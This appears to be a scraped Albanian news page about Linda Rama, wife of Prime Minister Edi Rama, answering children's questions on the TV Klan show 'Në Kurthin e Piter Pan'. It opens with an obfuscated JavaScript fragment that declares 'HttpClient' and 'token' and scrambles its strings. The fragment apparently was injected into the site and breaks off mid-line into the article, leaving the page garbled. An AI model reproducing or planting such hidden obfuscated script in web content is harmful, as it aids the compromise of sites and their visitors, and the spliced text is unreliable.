;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Të jesh gruaja e kryeministrit hall apo qejf? Përgjigjet gruaja e Edi Ramës

By

Në natën finale të emisionit “Në Kurthin e Piter Pan” në TV Klan, të ftuar kanë qenë dy personazhe shumë speciale.

Mbrëmja u çel me Ermal Metën, këngëtarin me origjinë shqiptare që na ka bërë të ndihemi shumë krenar, për ta mbyllur këtë sezon me Linda Ramën, Zonja e cila ka mbajtur një profil shumë të ulët publik, edhe pse është bashkëshortja e kryeministrit, Edi Rama.

Ajo iu është përgjigjur të gjitha pyetjeve të përgatitura nga fëmijët, të cilët janë përpjekur që ta fusin në “kurth”, Zonjën Rama, ndonëse ajo e kaloi me sukses këtë “konferencë” përpara gazetarëve të vegjël, shumë profesionist. “Është hall apo qejf të jesh gruaja e kryeministrit Edi Rama, ishte pyetja e parë që iu bë, për të cilën ajo iu përgjigj menjëherë, duke treguar se nuk është aspak “hall”, por është shumë me përgjegjësi.

“Hall nuk është, është e sigurt se kryeministrin e zgjedh populli për të drejtuar vendin dhe është vlerësimi madh. Është peshë shumë e madhe çdo ditë dhe natë, por kur sheh gjërat e mira që bëhen, ia vlen ta mbash këtë peshë”, u shpreh ajo. E megjithatë, të qenit bashkëshortja e një drejtuesi shteti, e ka detyruar atë që të heqë dorë nga disa gjëra, për të cilat Zonja Rama na i tregoi pa u nguruar aspak, shkruan Bordo.al.

“Kam hequr dorë nga disa gjëra, por ia vlen të heqësh për të qenë gruaja e kryeministrit. Unë kam dhënë shumë vite mësim, dhe tani nuk jap më për shkak se jam shumë e zënë”, iu përgjigj Zonja Rama, fëmijëve.

Artikuj të ngjashëm